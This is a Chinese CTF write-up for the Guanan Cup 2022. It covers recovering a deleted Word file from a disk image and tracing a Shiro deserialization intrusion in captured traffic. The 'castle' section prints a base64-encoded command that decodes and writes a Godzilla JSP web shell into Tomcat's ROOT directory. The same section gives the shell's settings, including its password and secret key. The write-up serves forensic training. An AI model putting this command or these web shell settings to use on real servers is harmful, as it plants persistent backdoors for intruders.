观安杯 2022 Writeup

2 min read

开学事比较多,并且观安和网鼎时间完美重合,简单划划水。

Misc

DISG

黑客李明在自己的磁盘上编辑完一份重要文件后立马删除了,我们拿到了他的磁盘镜像文件,你能帮我们找出来他所编辑过的机密文件吗?

image-20220826184903633

使用 DiskGenius 打开 img 文件,\$RECYCLE.BIN\S-1-5-21-87142730-3356978945-767715265-500 发现word文档,右击提取到桌面

image-20220826185005605

delete 删掉猫图,发现 flag

image-20220826185049808

image-20220826185055522

castle

某公司的网站遭到了黑客入侵,应急响应小组已经从防护设备中提取了入侵流量,请你一起分析黑客的攻击手法,并找出被黑客窃取的秘密

一顿分析下来发现是 shiro反序列化 的流量包

image-20220830110545458

解密一下

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

image-20220830111226982

发现通过 echo 执行了一段 base64 ,解码一下发现向 logout.jsp 写入了内容

ZWNobyBINHNJQUZ2Zi9XSUMvN1ZXYTIvYk5oVDlLNXlBQUNRbUVFbmFCR3RWcllpVERDaTJyQzNjWWdHR2ZhQ29hMXVkWGlPcFJLN2cvOTdMaHh3N3NkTzFSVDRrb3Noekw4ODlQT0wxcTRPZnlOU29vcDZUWHFiUk0za0toOWt2NG9VOE9qaytmaTZpWkZ4dGhkWnBaUC9melZYNVNZcC8xTTcrM0V1V0VGbmlrRndUNkEzVXVTYm45djJQUnVTZ2hyYkx5a0tTYTdveFNUNnpRWGN0S1BxWkphdUFjT3ZrUGMyV0J2NytoOGlNRFFwTXAycmlvRHlIV1ZHRFExR1p4ZVF3Umd3dm9aNmJCV1loWTU0UTM0K0pkSncxVFFtaUpoVWJpRkhMNFpPNEVUMlhhdG1haHA4WDdRSVp5WFRITEorRGVWTnJJMm9KTkRxN25FWXNrYnlvQzBPcjEwY3ZqK01hYnNsV25HNUI4aWxJWlA0N0xLZjRSbnRwMDB5UWpLWXM5bGxZRWtxVFBHOStLMnBSVW8wNnJxUXdja0hvWlMraE5VVlRFMWlMVUhkbGlZZ1ZDV1VpSzRPUHV6T2hZYWdaR2NJUVEwbnFJN0Z1NGdybkdtU25DclBrVjZDMW1NTkZNUWR0U0pWVWlIMEVzUzNHMWNVSmlsSHhyczJGQWFvM2E3UkhvOFBKVUYrcnBSRzA0cFV3Q3o0cDVtOXFBM1Awd0ZGTUtwNjdQUkROVGVQWjA2TlQrL0t4eGNNL0Z4cW9QZVFkQXBGaEZTVENCeXEwVzZBTU01dyt2NnhsazhQb2pBeWxNZ3ZWM0dweWwzRHdQdlQ0SkVUZmlMS0RMU245ZXVyQWZOYW9QMFdGcXJqNk9sT1VmT0xXVWFLMzJTZVFodmlkRmVid2tWYXZLekNMSnFjUkRzTnlGTHN0R0hyc3B2a1hpVHBzbUV4R0Z1R2tXUWl5cWZ4bndUYXpnbHY5RU5TMG1mRUFIQTVMSDhKbnd2Mm51MXJ2R0hKNnRPZnU0UmEwN3dDY0ltUzNKTHFyZVZWb3lTZG4wOHZ4QkJRS1EvWXBnenV2Zllhdzc2bjY2YW85dG40YkRlZW9QYlRjYUM5WHpnVTR5NDAyL0xybFF2U1BXeTZIUnkzbmlmMWZ5M2xXTE9UY0k3NWZmU0Mrci8yQitDSFhrMWx0TFBET2FnOFUyV2UxYjZoMjBzMW1Yc1ducVhtbjRRNStmWFZnTzFud0NsN0JJdDJ5bTRML3VuQm52eE1LMVRGNDBkcUdqZGV4US9mVVBtSXlFNlVHbGhRelFqWGU5cmlsalRrelNEL3I4R0xIM3I4c3NXbEhMRTJkSllZUnBuZkNYRXU4cG1aUjZIdXliZlIvZTgyL2R3U1F6Z3FRd1RBU3ZwODFjTmRSN09DSnMzdlJjTnRyenBRU3k3ZWRhVHVEY29Pb2lGQUszOU4xcTlrSHBPdVBaSlpTLzh1RWZhVjhkczhzTTQ2TVVUenE5OXlZYUxGbG5qZlkzSHBqZTU5dW0xcURUZnNYTmxWYlBMKzFBNG85bStzdTA3N2JIY2JZNzJ5V2RmOTdOSGlybi9XQkJNYXV5N1Y5MktnT0dQc0dFbzdDYXZmdkVEVGRGM0J4WlFJM0NnQUEgfGJhc2U2NCAtZHxnemlwIC1kID4gL3Vzci9sb2NhbC90b21jYXQvd2ViYXBwcy9ST09UL2xvZ291dC5qc3A=

image-20220830111337470

再次解密发现就是最常见的哥斯拉 jsp马

image-20220830111449880

在最后一个流里发现pass变成了supersuperpassword

image-20220830114708164

解密一下发现新写入路径 index.html 和 新密钥

path=/index.html
secretKey=57e7bebdf2501f02
evalClassName=org.apache.coyote.ser.std.SerializableSerializer
methodName=run
pwd=supersuperpassword

image-20220830115036657

我们直接更换密钥再次解密,解密最后的响应包得到flag

4611012B612C3BAEPHCNu5r7f03UZyZQ5gQIbjDUiDIV3stT2ZcFdJ93TLGhwtWGNkxIaVxiqBTwpqYoGA6ZJz8w/UD9h2A0vwpkyA==C9331C0E8C9FA966

image-20220830120311917

image-20220830120300464